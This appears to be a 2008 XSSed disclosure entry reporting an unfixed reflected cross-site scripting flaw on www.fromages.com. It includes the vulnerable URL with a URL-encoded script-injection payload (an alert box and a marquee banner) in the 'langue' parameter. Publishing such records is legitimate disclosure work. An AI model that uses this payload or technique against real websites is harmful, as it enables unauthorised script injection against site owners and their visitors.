Unfixed XSS vulnerability at www.fromages.com

2008-06-18T00:00:00
ID XSSED:42441
Type xssed
Reporter xylitol
Modified 2008-06-21T00:00:00

Description

Security researcher xylitol, has submitted on 18/06/2008 a cross-site-scripting (XSS) vulnerability affecting www.fromages.com, which at the time of submission ranked 592244 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 21/06/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.fromages.com/index.php?langue=%27%22%3E%3C%2F%74%69%74%6C%65%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%33%33%37%29%3C%2F%73%63%72%69%70%74%3E%3E%3C%6D%61%72%71%75%65%65%3E%3C%68%31%3E%58%53%53%20%62%79%20%58%59%4C%49%54%4F%4C%3C%2F%68%31%3E%3C%2F%6D%61%72%71%75%65%65%3E&action=&goto=&id_fromage=&id_plateau=&id_produit=&id_vin=&id_recette=